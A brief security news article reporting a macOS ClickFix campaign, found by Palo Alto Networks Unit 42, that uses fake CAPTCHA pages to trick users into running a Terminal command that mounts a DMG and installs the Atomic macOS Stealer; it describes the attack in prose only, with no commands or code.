New macOS ClickFix attack silently mounts DMGs to push infostealer

A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.

The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.

Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.

Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS's native hdiutil utility, locates the application bundle it contains, and launches it automatically.

ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied "fix instructions." The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.